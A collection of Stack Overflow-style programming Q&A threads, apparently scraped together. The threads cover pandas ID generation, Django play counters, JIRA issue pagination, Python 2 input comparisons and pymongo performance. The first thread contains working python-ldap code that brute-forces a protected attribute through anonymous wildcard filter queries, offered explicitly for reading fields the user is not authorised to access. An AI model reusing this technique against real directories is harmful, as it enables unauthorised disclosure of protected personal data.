Binary search of inaccessible data field in LDAP from Python

I'm interested in reproducing a particular python script.
I have a friend who was accessing an LDAP database without authentication. There was a particular field of interest, which we'll call nin (an integer), and this field wasn't accessible without proper authentication. However, my friend managed to recover this field through a kind of binary search (rather than just looping through integers) on the data: he would guess the first digit, check whether it was greater or less than his starting value, and adjust it until the query indicated a match, then add another digit and keep checking until he had the exact value of the integer nin.
Any ideas on how he went about this? I have access to a similarly set up database.

Your best bet would be to get authorization to access that field. You are circumventing the security of the database otherwise.

Figured it out. I just needed to filter on (&(cn=My name)(nin=guess*)) and keep refining the guess until the filter returned the correct result.
Code follows in case anyone else needs to find a field they aren't supposed to access, but can check results for and know the name of.
# Requires python-ldap (import ldap); self.l is an open LDAP connection.
def lookup(self, username="", guess=0, verbose=0):
    guin = guess
    result_set = []
    # The filter matches entries whose nin starts with the current guess.
    varsearch = "(&(name=" + str(username) + ")(nin=" + str(guin) + "*))"
    result_id = self.l.search("", ldap.SCOPE_SUBTREE, varsearch, ["nin"])
    while True:
        try:
            result_type, result_data = self.l.result(result_id, 0, 5.0)
            if result_data == []:
                break
            else:
                if result_type == ldap.RES_SEARCH_ENTRY:
                    result_set.append(result_data)
        except ldap.TIMEOUT:
            return {"name": username}
    if len(result_set) == 0:
        # No entry starts with this prefix: try the next digit value.
        return self.lookup(username, guin + 1, verbose)
    else:
        if guess < 1000000:
            # Prefix matched: shift left and start guessing the next digit.
            return self.lookup(username, guess * 10, verbose)
        else:
            if verbose == 1:
                print "Bingo!",
            return str(guess)
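For context, here is a minimal sketch of the kind of class this method assumes (the class name, server URL and search base are placeholders I made up; the anonymous simple_bind_s() mirrors the unauthenticated access described in the question, and lookup() from above would be pasted into the class body):

import ldap

class NinFinder(object):
    def __init__(self, server="ldap://ldap.example.com"):
        self.l = ldap.initialize(server)
        self.l.simple_bind_s()  # anonymous bind, no credentials

    # lookup() as defined above goes here

finder = NinFinder()
print finder.lookup(username="My name", verbose=1)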

Related

Pandas: Automatically generate incremental ID based on pattern

I want to create a dataframe to which various users (name, phone number, address...) are continuously being added. Now I need a function that automatically generates an ID once a new, non-existing user is added to the dataframe.
The first user should get the ID U000001, the second user the ID U000002 and so on.
What's the best way to do this?
If I'm understanding correctly, the main problem is the leading zeros, i.e. you can't just increment the previous ID, because casting '0001' to an int gives 1 and the leading zeros are lost. Please correct me if I'm wrong.
Anyway, here's what I came up with. It's far more verbose than you probably need, but I wanted to make sure my logic was clear.
def foo(previous):
    """
    Takes in string of format 'U#####...'
    Returns incremented value in same format.
    Returns None if previous already maxed out (i.e. 'U9999')
    """
    value_str = previous[1:]    # chop off 'U'
    value_int = int(value_str)  # get integer value
    new_int = value_int + 1     # increment
    new_str = str(new_int)      # turn back into string
    # return None if exceeding character limit on ID
    if len(new_str) > len(value_str):
        print("Past limit")
        return None
    # add leading zeroes
    while len(new_str) < len(value_str):
        new_str = '0' + new_str
    # add 'U' and return
    return 'U' + new_str
Please let me know if I can clarify anything! Here's a script you can use to test it:
# test
current_id = 'U0001'
while True:
    current_id = foo(current_id)
    print(current_id)
    if current_id is None:
        break
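As a side note, Python's built-in zero padding can express the same increment more compactly. This is just an alternative sketch, assuming the same 'U' + zero-padded-digits format and the fixed width of 6 used in the question:

def next_id(previous, width=6):
    # 'U000041' -> 'U000042'; returns None once the numeric part overflows the width
    new_int = int(previous[1:]) + 1
    if new_int >= 10 ** width:
        return None
    return 'U' + str(new_int).zfill(width)

print(next_id('U000001'))  # U000002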

Increment Model Field Inside Get Or Create Django

I am developing a music web application where I am trying to calculate the number of times a song was played. When the play button is clicked, a function called getLink() is called. Here, I try to use get_or_create to update the PlayCount model, like so.
h = PlayCount.objects.all()
if len(h) == 0:
    u = PlayCount.objects.get_or_create(
        user=request.user.username,
        song=song,
        plays=1,
    )[0]
    u.save()
else:
    flag = False
    for i in h:
        if i.song == song:
            u = PlayCount.objects.get_or_create(
                user=request.user.username,
                song=song,
                plays=plays + 1,  # 'plays' is never defined here, hence the error below
            )[0]
            u.save()
            flag = True
            break
        else:
            pass
    if flag is False:
        u = PlayCount.objects.get_or_create(
            user=request.user.username,
            song=song,
            plays=1,
        )[0]
        u.save()
    else:
        pass
However, when I enter the else branch, 127.0.0.1:8000 returns plays is not defined.
How may I proceed?
I don't understand why you loop through all the PlayCount objects when all you need is to find the one for the specific user and song.
Note also that get_or_create will only find the specific object that matches all the parameters you pass to it, so get_or_create(user=..., song=..., plays=...) will try to find the one with the exact number of plays you specify, which isn't what you want.
You only need to do this:
from django.db.models import F

play_counter, created = PlayCount.objects.get_or_create(
    user=request.user,
    song=song,
    defaults={'plays': 1})
if not created:
    play_counter.plays = F('plays') + 1
    play_counter.save()
So here we first fetch or create the counter for the particular song and user. If we create it, we set plays to 1 by setting it in the defaults parameter.
Then, if it is not created (i.e. it's an existing one), we increment plays by 1 using the F expression, which ensures it's updated directly in the database (and there's no risk of inconsistency if another request updates the same value at the same time).
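The question never shows the PlayCount model itself, so here is a hypothetical definition the snippet above would work against (field names taken from the code; the Song foreign key and everything else are assumptions on my part):

from django.conf import settings
from django.db import models

class PlayCount(models.Model):
    # hypothetical model matching the fields used above
    user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
    song = models.ForeignKey('Song', on_delete=models.CASCADE)
    plays = models.PositiveIntegerField(default=0)

    class Meta:
        unique_together = ('user', 'song')  # one counter per user/song pair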

Get list of all JIRA issues (python)

I am trying to get a list of all JIRA issues so that I may iterate through them in the following manner:
from jira import JIRA
jira = JIRA(basic_auth=('username', 'password'), options={'server':'https://MY_JIRA.atlassian.net'})
issue = jira.issue('ISSUE_KEY')
print(issue.fields.project.key)
print(issue.fields.issuetype.name)
print(issue.fields.reporter.displayName)
print(issue.fields.summary)
print(issue.fields.comment.comments)
The code above returns the desired fields (but only one issue at a time); however, I need to be able to pass a list of all issue keys into:
issue = jira.issue('ISSUE_KEY')
The idea is to write a for loop that would go through this list and print the indicated fields.
I have not been able to populate this list.
Can someone point me in the right direction please?
def get_all_issues(jira_client, project_name, fields):
    issues = []
    i = 0
    chunk_size = 100
    while True:
        chunk = jira_client.search_issues(f'project = {project_name}', startAt=i, maxResults=chunk_size, fields=fields)
        i += chunk_size
        issues += chunk.iterable
        if i >= chunk.total:
            break
    return issues

issues = get_all_issues(jira, 'JIR', ["id", "fixVersion"])
options = {'server': 'YOUR SERVER NAME'}
jira = JIRA(options, basic_auth=('YOUR EMAIL', 'YOUR PASSWORD'))
size = 100
initial = 0
while True:
    start = initial * size
    issues = jira.search_issues('project=<NAME OR ID>', start, size)
    if len(issues) == 0:
        break
    initial += 1
    for issue in issues:
        print 'ticket-no=', issue
        print 'IssueType=', issue.fields.issuetype.name
        print 'Status=', issue.fields.status.name
        print 'Summary=', issue.fields.summary
The first 3 arguments of jira.search_issues() are the jql query, starting index (0 based hence the need for multiplying on line 6) and the maximum number of results.
You can execute a search instead of a single issue get.
Let's say your project key is PRO-KEY. To perform a search, you have to use this query:
https://MY_JIRA.atlassian.net/rest/api/2/search?jql=project=PRO-KEY
This will return the first 50 issues of PRO-KEY and, in the total field of the response, the total number of issues present.
Having taken that number, you can perform further searches by adding this to the previous query:
&startAt=50
With this new parameter you will be able to fetch the issues from 51 to 100 (or 50 to 99 if you consider the first issue 0).
The next query will be &startAt=100, and so on, until you have fetched all the issues in PRO-KEY.
If you wish to fetch more than 50 issues, add to the query:
&maxResults=200
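For illustration, here is a rough sketch of that pagination loop against the REST endpoint using the requests library (this sketch is mine, not part of the original answer; the credentials and project key are placeholders):

import requests

base_url = 'https://MY_JIRA.atlassian.net/rest/api/2/search'
auth = ('username', 'password')  # placeholder credentials
issues = []
start_at = 0
while True:
    resp = requests.get(base_url,
                        params={'jql': 'project=PRO-KEY', 'startAt': start_at, 'maxResults': 50},
                        auth=auth)
    data = resp.json()
    issues.extend(data['issues'])
    start_at += len(data['issues'])
    if start_at >= data['total'] or not data['issues']:
        break
print(len(issues), 'issues fetched')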
You can use the jira.search_issues() method to pass in a JQL query. It will return the list of issues matching the JQL:
issues_in_proj = jira.search_issues('project=PROJ')
This will give you a list of issues that you can iterate through.
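For example, iterating over the result and printing a couple of fields (just an illustration, using the same jira object as above):

for issue in issues_in_proj:
    print(issue.key, issue.fields.summary)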
Starting with Python 3.8 (which added the walrus operator), reading all issues can be done in a relatively short and elegant way:
issues = []
while issues_chunk := jira.search_issues('project=PROJ', startAt=len(issues)):
    issues += list(issue for issue in issues_chunk)
(since we need len(issues) at every step, we cannot use a list comprehension, can we?)
Together with initialization and caching and "preprocessing" (e.g. just taking issue.raw) you could write something like this:
import json
import os
import jira

jira = jira.JIRA(
    server="https://jira.at-home.com",
    basic_auth=json.load(open(os.path.expanduser("~/.jira-credentials"))),
    validate=True,
)
issues = json.load(open("jira_issues.json"))
while issues_chunk := jira.search_issues('project=PROJ', startAt=len(issues)):
    issues += [issue.raw for issue in issues_chunk]
json.dump(issues, open("jira_issues.json", "w"))

Python define and call function - method behavior changing upon processing user input

I defined a method, like so:
class MyDatastructure(object):
    # init method here
    def appending(self, elem):
        self.data.append(elem)
        if self.count >= self.size:
            print "popping " + str(self.data[0])
            print "inserting " + str(elem)
            self.data.pop(0)
        elif self.count < self.size:
            self.count += 1
        print "count after end of method " + str(self.count)
I tested it out, and it worked as it was supposed to.
Underneath this definition, I wanted to process some user input and use this method. However, it doesn't enter the if case anymore! Any idea why?
# in the same file
def process_input():
    while True:
        # getting user input
        x = raw_input()
        ds = MyDatastructure(x)  # creating data structure of size taken from user input, count initially 0
        ds.appending(1)
        ds.appending(2)
        ds.appending(3)
        # Still appending and NOT popping, even though the if in appending doesn't allow it!
        # This functionality works if I test it without user input!
The problem is with this line:
x = raw_input()
Calling raw_input will return a string. If I type in the number 3, that means that the data structure will assign the string "3" to the size.
In Python 2, comparing a string to a number doesn't raise an error, but the result is based on the types rather than the values (an int always compares as less than a str), which is why the if branch is never entered -- see this StackOverflow answer. Note that Python 3 fixes this piece of weirdness -- attempting to compare a string to an int will cause a TypeError exception to occur.
Instead, you want to convert it into an int so you can do your size comparison properly.
x = int(raw_input())
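A tiny demonstration of the difference (results noted in the comments; the Python 2 ordering is a CPython implementation detail):

# Python 2
print 3 >= "3"        # False: ints always sort before strings in CPython 2
print int("3") >= 3   # True: compare numbers with numbers

# Python 3
# 3 >= "3"            # raises TypeError: '>=' not supported between instances of 'int' and 'str'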

pymongo taking over 24 hours to loop through 200K records

I have two collections in a db, page and pagearchive, that I am trying to clean up. I noticed that new documents were being created in pagearchive instead of values being added to embedded documents as intended. So essentially what this script does is go through every document in page, find all copies of that document in pagearchive, move the data I want into a single document, and delete the extras.
The problem is that there are only 200K documents in pagearchive, and based on the count variable I am printing at the bottom, it's taking anywhere from 30 to 60+ minutes to iterate through 1000 records. This is extremely slow. The largest count of duplicate docs I have seen is 88, but for the most part when I query pageArchive on uu, I see 1-2 duplicate documents.
mongodb is on a single instance 64 bit machine with 16GB of RAM.
The uu key that is being iterated on in the pageArchive collection is a string. I made sure there was an index on that field (db.pagearchive.ensureIndex({uu:1})), and I also did a mongod --repair for good measure.
My guess is the problem is my sloppy python code (I'm not very good at it) or perhaps something I am missing that is necessary for mongodb. Why is it going so slowly, and what can I do to speed it up dramatically?
I thought maybe the uu field being a string was causing a bottleneck, but it's the unique property in the document (or will be once I clean up this collection). On top of that, when I stop the process and restart it, it speeds up to about 1000 records a second, until it starts finding duplicates again in the collection; then it goes dog slow again (deleting about 100 records every 10-20 minutes).
from pymongo import Connection
import datetime

def match_dates(old, new):
    if old['coll_at'].month == new['coll_at'].month and old['coll_at'].day == new['coll_at'].day and old['coll_at'].year == new['coll_at'].year:
        return False
    return new

connection = Connection('dashboard.dev')
db = connection['mydb']
pageArchive = db['pagearchive']
pages = db['page']

count = 0
for page in pages.find(timeout=False):
    archive_keep = None
    ids_to_delete = []
    for archive in pageArchive.find({"uu": page['uu']}):
        if archive_keep == None:
            # this is the first record we found, so we will store data from duplicate records with this one; delete the rest
            archive_keep = archive
        else:
            for attr in archive_keep.keys():
                # make sure we are dealing with an embedded document field
                if isinstance(archive_keep[attr], basestring) or attr == 'updated_at':
                    continue
                else:
                    try:
                        if len(archive_keep[attr]) == 0:
                            continue
                    except TypeError:
                        continue
                    try:
                        # We've got our first embedded doc from a property to compare against
                        for obj in archive_keep[attr]:
                            if archive['_id'] not in ids_to_delete:
                                ids_to_delete.append(archive['_id'])
                            # loop through secondary archive doc (comparing against the archive keep)
                            for attr_old in archive.keys():
                                # make sure we are dealing with an embedded document field
                                if isinstance(archive[attr_old], basestring) or attr_old == 'updated_at':
                                    continue
                                else:
                                    try:
                                        # now we know we're dealing with a list, make sure it has data
                                        if len(archive[attr_old]) == 0:
                                            continue
                                    except TypeError:
                                        continue
                                    if attr == attr_old:
                                        # document prop. match; loop through embedded document array and make sure data wasn't collected on the same day
                                        for obj2 in archive[attr_old]:
                                            new_obj = match_dates(obj, obj2)
                                            if new_obj != False:
                                                archive_keep[attr].append(new_obj)
                    except TypeError, te:
                        'not iterable'
    pageArchive.update({
        '_id': archive_keep['_id']},
        {"$set": archive_keep},
        upsert=False)
    for mongoId in ids_to_delete:
        pageArchive.remove({'_id': mongoId})
    count += 1
    if count % 100 == 0:
        print str(datetime.datetime.now()) + ' ### ' + str(count)
I'd make the following changes to the code (a short sketch applying them follows below):
In match_dates, return None instead of False and test with if new_obj is not None: this checks the reference identity without calling the object's __ne__ or __nonzero__.
In for page in pages.find(timeout=False):, if only the uu key is used and the page documents are big, passing fields=['uu'] to find should speed up the queries.
Change archive_keep == None to archive_keep is None.
archive_keep[attr] is looked up 4 times. It will be a little faster to save keep_obj = archive_keep[attr] and then use keep_obj.
Change ids_to_delete = [] to ids_to_delete = set() (and .append to .add). Then if archive['_id'] not in ids_to_delete: will be O(1).
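To make the suggestions concrete, here is a rough sketch of how the top of the loop might look with them applied (same collection names and legacy pymongo API as the question; the merging logic is omitted, so this is illustrative rather than a drop-in replacement):

from pymongo import Connection

connection = Connection('dashboard.dev')
db = connection['mydb']
pageArchive = db['pagearchive']
pages = db['page']

def match_dates(old, new):
    # return None instead of False so the caller can use an identity check
    same_day = (old['coll_at'].month == new['coll_at'].month
                and old['coll_at'].day == new['coll_at'].day
                and old['coll_at'].year == new['coll_at'].year)
    return None if same_day else new

for page in pages.find(timeout=False, fields=['uu']):  # fetch only the uu key
    archive_keep = None
    ids_to_delete = set()                              # O(1) membership tests
    for archive in pageArchive.find({"uu": page['uu']}):
        if archive_keep is None:                       # identity check, not ==
            archive_keep = archive
            continue
        ids_to_delete.add(archive['_id'])              # .add on a set, not .append
        # ...merge embedded documents into archive_keep as in the original script,
        # caching keep_obj = archive_keep[attr] and testing match_dates(...) is not None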
